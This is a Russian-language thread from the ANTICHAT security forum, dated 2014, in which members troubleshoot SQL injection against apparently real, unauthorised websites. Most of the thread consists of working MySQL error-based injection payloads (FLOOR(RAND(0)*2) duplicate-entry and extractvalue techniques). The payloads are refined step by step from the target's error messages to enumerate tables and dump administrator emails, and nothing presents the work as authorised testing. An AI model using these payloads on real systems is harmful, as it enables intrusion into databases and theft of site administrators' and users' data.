ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.12.2014, 22:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от EksTasy
EksTasy said:
есть уязвимость или нет, не могу понять?
было бы не плохо слить материалы для печати)
По линку нет.
route - не динамический параметр:
/u/index.php?product_id=36103
product_id - int casting:
/u/index.php?product_id=36103x
/u/index.php?product_id=x36103
|
|
|
|
07.12.2014, 22:21
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от EksTasy
EksTasy said:
есть уязвимость или нет, не могу понять?
было бы не плохо слить материалы для печати)
с чего вы взяли? нет.
|
|
|
07.12.2014, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
ppppppppppppp млин ...
подскажите
запрос пост
&more[]=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((database()),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
ответ
Duplicate entry 'ex_info:1' for key 'group_key'
ну блин а дальше тупик,как зти таблицы вытащить((
|
|
|
|
07.12.2014, 23:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
и перебирайте лимитом все поля
и, кстати, можно проще запрос
Код:
Code:
and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))
UPDATE:
Код:
Code:
1'and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))='1
вот так должно сработать |
|
|
|
07.12.2014, 23:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Сообщение от faza02
faza02 said:
Код:
Code:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
и перебирайте лимитом все поля
и, кстати, можно проще запрос
Код:
Code:
and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))--+
спасибо ,вот проще не идёт
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',
|
|
|
|
08.12.2014, 00:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
можно ещё вопросик
что я опять делаю не так
(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает 16
а
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает
Subquery returns more than 1 row
(((
|
|
|
|
08.12.2014, 01:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от madam
madam said:
можно ещё вопросик
что я опять делаю не так
(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает 16
а
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает
Subquery returns more than 1 row
(((
попробуйте так:
Код:
Code:
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
изменив на нужный id.
|
|
|
|
08.12.2014, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Сообщение от faza02
faza02 said:
попробуйте так:
Код:
Code:
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
изменив на нужный id. ((
Subquery returns more than 1 row
|
|
|
|
08.12.2014, 01:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от madam
madam said:
((
Subquery returns more than 1 row
Код:
Code:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT substr(group_concat(email),1,150) FROM administrator),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
если проблема не решится, отпишите мне в jabber, не стоит захламлять тему. вам бы для начала прочитать маны mysql неплохо бы было.
|
|
|
|
08.12.2014, 01:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Спасибо,почти решилась,дальше разберусь
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
